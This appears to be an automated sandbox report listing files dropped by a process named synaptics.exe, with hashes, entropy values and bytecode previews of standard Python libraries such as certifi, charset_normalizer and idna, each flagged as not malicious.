                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7562
                                                                                                                                                                                                                Entropy (8bit):5.071585090712447
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:FpcgPE5vmnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkB:Vyvmnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                                MD5:E4ED11A273505488BB539188891E2CF7
                                                                                                                                                                                                                SHA1:25416A0D2841AEE58B5383F8F1E4C53A7D70B1D0
                                                                                                                                                                                                                SHA-256:512D486D79533C6E18961020AEF04A22B0D7BFF22EA80970B6AAB7FFE8CD52E8
                                                                                                                                                                                                                SHA-512:04223EA98073995795B55A3FD7D2847B991343D82C49C4A0F34BBF826B3ABBE97967479AE00E2EEFB3EC3ADAD1F4B3A3862CB67D8D87799894605AF0F3EF9E5E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........ .f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....GC:\Users\user\Desktop\tmp\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d.d.l.}.|...d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):269
                                                                                                                                                                                                                Entropy (8bit):4.98126776272356
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/meNbsZvEG/Xg6nCbWjN2o9ZAuGuFM9Arsq4G:CmeNQeGVN2o9+0qq7
                                                                                                                                                                                                                MD5:F187A07BBB083AA3C70EC08A04C2DCD7
                                                                                                                                                                                                                SHA1:8A8DC32A68A0268EF6BF63697FCC1C10ACB3E7D0
                                                                                                                                                                                                                SHA-256:5C94177375943807FDE077AA166688099449CA428A84377F64AA2580A6D682B0
                                                                                                                                                                                                                SHA-512:2217503A5EAC6618AD33A61404767E9DF38345449C5BBD34DF78C356A58B9530241231ED28911747660436FDDA76246E05B87D876E616884D6177B9DFCEB63D4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....?C:\Users\user\Desktop\tmp\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2100
                                                                                                                                                                                                                Entropy (8bit):4.924868669405933
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:TBUoxmgDZLaUAl/g95K3Q8+epPUHq7J8nH:NUC/lcg955epA1H
                                                                                                                                                                                                                MD5:5C6EF0BF6C7342AA12C6F39EEB1BE249
                                                                                                                                                                                                                SHA1:9E770A4A843417827A4988AB74DD235D75141364
                                                                                                                                                                                                                SHA-256:84D732BCB8681BD1028042FCF3AB63323BC1C5F35F2978E455EBB1736108837E
                                                                                                                                                                                                                SHA-512:48031F2B3F71734A30FADACC941E596E64108F5EE5899592C3269DD71649583A0E347FCCD3DFB7D05BAE7517F126B37D2B6EF502AABDFA5E11AFC51F419AC64E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....;C:\Users\user\Desktop\tmp\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......read
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1565
                                                                                                                                                                                                                Entropy (8bit):5.691547041597721
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JV4U0b8ybWPxg+QQMzy/ClB3N/PLo3bIB3Nvh4VMhGlXwu+H2C/4PvBGJOcuUqer:/4jbqjQtyat/c2vhCMhju/C/yv+K/eUy
                                                                                                                                                                                                                MD5:012214884DAA07BBBC4503B705B8993F
                                                                                                                                                                                                                SHA1:FB8314DF73EAC1F8AB1C08ABD506A35D4704C938
                                                                                                                                                                                                                SHA-256:FEA6D8BBFE248E3E92E79419FEC18CB67EF1686228175A9156F6F174D379B0D3
                                                                                                                                                                                                                SHA-512:BF7152F141B2D62F5ED7CF5B7056E3641ECB5A81869DA6805AA1B31E2B4D06C76D3EB5C32E4BCE16251B650E4E41C8AFEA04ED9822F085D52E142E036ED4D481
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11382
                                                                                                                                                                                                                Entropy (8bit):5.817991079386276
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:9WeJLd8V6fySfPAraft774k4M1Cz9ZZER9OBJzCTrFkYAr64BpmA+ifAgQSK5FQm:9WeJLdcS7ft77cZZaSzCvNm64mA+ifA9
                                                                                                                                                                                                                MD5:65F8AFAA105004B0B5E2C2127430A129
                                                                                                                                                                                                                SHA1:2C8EFFBDC2E71EBF5C72DA0B741BD46534EFC637
                                                                                                                                                                                                                SHA-256:736DF143E538712D98BE9E60B093B3CA06E67A6AC944FCFD94E8C3FDBE51912B
                                                                                                                                                                                                                SHA-512:C88D8B845419788D789545E7AB829C1C45FFA3AC03A9D6E2EAAD086161DBEFED91985DCD4CC43E4FA090049ABB99EB690C0D4F74B489105BCD93E9B3B6C94224
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.T.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9643
                                                                                                                                                                                                                Entropy (8bit):5.512142661441853
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:Dq5OeApoIRl8if8gZ+hjj2mspqjrOBTLpPc7nSgGKO56ytTatX79w/kfTYY:u5iTf8g5mymOBT9Pc7nLGKO56yQt7e/G
                                                                                                                                                                                                                MD5:1FB06D9519822F460C57F1D3EFC6C9BE
                                                                                                                                                                                                                SHA1:4561F40C39217B653A9FAFBF34CB85AFC0B21979
                                                                                                                                                                                                                SHA-256:56AD1D2E6E724CFC3819E3FE8044A7D21FB32D7CB77F671D7D02058BF4DD2C33
                                                                                                                                                                                                                SHA-512:6C7790596D60D82079C6150ACE04F2DF861E415E2A87943FB513DC0AD1ED5B3869C63317254EA750FD8DDA33BA04BF11D9895E99154EAABC53B2FA74FCDD6B20
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):30431
                                                                                                                                                                                                                Entropy (8bit):5.8808950140209815
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:dvZKN0taqbKcwF7wuCDnbobpp2dmnFu3GJusAVlufzR7c:dvZ6EKcR7XOP8g8luft7c
                                                                                                                                                                                                                MD5:222438BB16A18E562E4AE01B618EE87C
                                                                                                                                                                                                                SHA1:03162C9FD4229925A405943DC6B76D121B8222DA
                                                                                                                                                                                                                SHA-256:0B65D1469F38B2AF5943B3317CE670314636C7CFEE616B91EA7757D1C15EAA94
                                                                                                                                                                                                                SHA-512:0DE5F9DF4F44A7A493D466D5A4C94C9A388BD1AB84900E4D451C9B7C603E3E760E268030A4FD97F06695B018795BDA404293E106EFE7F42073AB703308FACFC4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1831
                                                                                                                                                                                                                Entropy (8bit):5.48777938186721
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3fwwE8mcebSh3Ue75yubxeNOhsV4Re+NK29:3fwAmcebSyo5yc4NFV4Re+Nn
                                                                                                                                                                                                                MD5:1009C8BB743455077DDF6444EF11D867
                                                                                                                                                                                                                SHA1:74843D43445001F872CAED1720B9046FE1E1F478
                                                                                                                                                                                                                SHA-256:57FCE08C3596E677F60505196F600F9B13F1C6545BB53FB9CA235047FD1E6034
                                                                                                                                                                                                                SHA-512:C7EE532C6066D762C621262E6835925174431CED3D01C989542F5A1BAEB9BF6276882DC466C16BF4413F0E97AD37F3DC1C29B315CC481C37ED481408F2551145
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fM........................@...sr...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.....f...f.d.d...Z.d.S.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCEF..byte_str..should_rename_legacy..kwargs..returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should be mostly backward-compatible.. Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it). This function is deprecated and should be used to migrate your project easily, consult the documentation for. further information. Not planned for removal... :param byte_str: The byte seque
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11526
                                                                                                                                                                                                                Entropy (8bit):5.170467557440603
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:o3OuBwM2HQVZI3mkrM0Af4/W7QeyRhhpermRK+pQCBdjWdIq:oeuaM2HQVZIjrdAf4eSvhpeKc+iCHWdD
                                                                                                                                                                                                                MD5:401F3CAB166C15E51ED7A0779E4CF87E
                                                                                                                                                                                                                SHA1:15CD2925274CF8F94B82C8CD7C5020EA637BD739
                                                                                                                                                                                                                SHA-256:3A9EDD6820BCB0D387EC8CE29F2B7F69A34804CB0E79D2CE6723ACE516E6C9A2
                                                                                                                                                                                                                SHA-512:FBAD3408BA42C729C88EBA09D274D1AC1FB1B923F731148CFA1EB3FB9E75F6D884B4AAF5C22299AAD8DBEED2244068347CE95B99C385E4AEDFB4CD25B08FBA88
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z...d=d.e.d.e.d.e.d.e.d.d.d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d>d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d ....Z.e.d.e.e...f.d!d"....Z.e.d.e.f.d#d$....Z.e.d.e.f.d%d&....Z.e.d.e.f.d'd(....Z.e.d.e.f.d)d*....Z.e.d.e.f.d+d,....Z.e.d.e.f.d-d.....Z.e.d.e.d...f.d/d0....Z.e.d.e.f.d1d2....Z.e.d.e.e...f.d3d4....Z.e.d.e.e...f.d5d6....Z d?d8e.d.e.f.d9d:..Z!e.d.e.f.d;d<....Z"d.S.)@..CharsetMatchN..payload..guessed_encoding..mean_mess_ratio..has_sig_or_bom..languages..CoherenceMatches..decod
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8907
                                                                                                                                                                                                                Entropy (8bit):5.462284194518911
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:DKkSSo/TPTRTa5Tl1T+T8IunXUb2ZQr4lYuoFaFEj:mSQrBalFA8ImESycrFo
                                                                                                                                                                                                                MD5:938A582157CF39D0A5283977EC600AF9
                                                                                                                                                                                                                SHA1:8E0A70685DB56C5CC383CB4BB5F6BC47AD588D81
                                                                                                                                                                                                                SHA-256:825A7334F6C3DB229B2701F9AFB2D09C1C8FD9B411FAE9B53C7FE87D58AF02CF
                                                                                                                                                                                                                SHA-512:7D532781E2DA30026F9738E6DB85F9AE5FFAA86A40D34143A13CE78EF882D9D0B3ECB297982D25F9E77FA8EB496C5E35FB6599AA28DB430C319F739870CA7538
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                Entropy (8bit):5.207648702853754
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/j/z/Oszurb64bs5jDGuFM9ArsQx6G3D8Isi:Cj/z/OsJasZrqQ8GT8Iv
                                                                                                                                                                                                                MD5:02B139E6B23FD4594387F184E4149ABF
                                                                                                                                                                                                                SHA1:DC1C6C0C7DB882962B52FFB55BF2A80751438DAB
                                                                                                                                                                                                                SHA-256:BBAD3386FD4BE12BDCFF363D56A11CA10DB47F2BA87BC8314AB22ACDCDD4AE96
                                                                                                                                                                                                                SHA-512:E60E47CDBD01D756828027C208C99A4D1AE4CC793C832419B0A906DB0B6A62466996B420F3E0E387C128A9AE64183828980BE58EA8D139D715A374F6F80BF971
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION..r....r.....IC:\Users\user\Desktop\tmp\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):817
                                                                                                                                                                                                                Entropy (8bit):5.058350317515534
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CeSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/Dnzx5:KijeXL/whvOcAdtOb8fcjOb89TD
                                                                                                                                                                                                                MD5:E0EBB95983EFD234C19BA92C33992AA1
                                                                                                                                                                                                                SHA1:6550011896A3AA5C5E842E2F8A74436F07F5DE14
                                                                                                                                                                                                                SHA-256:E7B552EC0685D30FC2DC662133ADD8DE7D6BB4552FDD9F6776FE8B8E0B904C8D
                                                                                                                                                                                                                SHA-512:497041C441DE475839E6DE02FF9DACFA0FA00F5B673F7E7747861E4BB7474954F2C42EDAEE22145651D39F9B62686CABA9F1468FEEFD05806B7EFCCA36E9C845
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....<C:\Users\user\Desktop\tmp\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9914
                                                                                                                                                                                                                Entropy (8bit):5.44308624083872
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:0ePGIILf6b/+bMh9t5uszP0M7Bhu5XCwY2uVNnaMWT/czpko:PPpIQ+bMPt5usb1h0XFY2ubnUbQ
                                                                                                                                                                                                                MD5:FD8850AD8A4A6A5F524DDBE9480E90F0
                                                                                                                                                                                                                SHA1:A813A19299326EA369766ED8F90DCCED9C19C862
                                                                                                                                                                                                                SHA-256:E2224B00EB1F364C89DD93770C3101D80187ECB766B9D60CF20445D257C21D30
                                                                                                                                                                                                                SHA-512:529110FB958DCC6223608A0DFC4A71550C0A834A1788B15B85F97B38CFD10AF3CF8AFCEAEA62653719DEE1A0B17BE1AC9B37D4F35BAC5ECEE83393DC05580BCA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fR5.......................@...sj...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d ..Z.d.e.e.e.f...d!e.d.e.f.d"d#..Z.dFd.e.d%e.d.e.f.d&d'..Z.d.e.d.e.f.d(d)..Z.d.e.d.e.f.d*d+..Z d.e.d.d.f.d,d-..Z!d.e.d.e.d.e.f.d/d0..Z"dFd.e.d.e.d1e.d.e.f.d2d3..Z#d.e.e.e.e$f...d.d.f.d4d5..Z%d.e.d.e.f.d6d7..Z&d.e.e.e.e$f...d.e.f.d8d9..Z'dGd;e.d<e.d=e.d.e.f.d>d?..Z(.$.$.$.$dHd.e.e.e.e$f...d@e.dAe.d<e.d=e.d.e.f.dBdC..Z).$.$.$dId.e.e.e.e$f...d@e.dAe.d<e.d.e.f.dDdE..Z*d.S.)J.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....])%.0....1....2....3....4....5....6....7....8....9...._....a....b....c....d....e....f....g....h....i....j....k....l....m....n....o....p....q....r....s....t....u....v....w....x....y....z...c....................@........e.Z.d.Z.d.Z.d.S.)...IDN
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):198616
                                                                                                                                                                                                                Entropy (8bit):3.52080144073603
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:IIS0p2ZbbO4g3aD8yynBXqD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:I621S458yyr
                                                                                                                                                                                                                MD5:51765189ACA9E7BCFB8B67A5B2F5F2F4
                                                                                                                                                                                                                SHA1:B9B75DC209A68ACB1B0F98A8DFBCFE026C6E0AAF
                                                                                                                                                                                                                SHA-256:9896E6F2A1C1E64CA095C1EF3596AD0281274A79CA1A46E3C2C3412A585ECE2A
                                                                                                                                                                                                                SHA-512:4192D6EB00407A48727DC84C3549E1B0667C2E48EC83B5A6380989DED6A28E97B4B00F3BEA84A9931EDE4E6FCD1D6C588E9E375A96F1F560DBD2E64EB62062A5
                                                                                                                                                                                                                Malicious:false
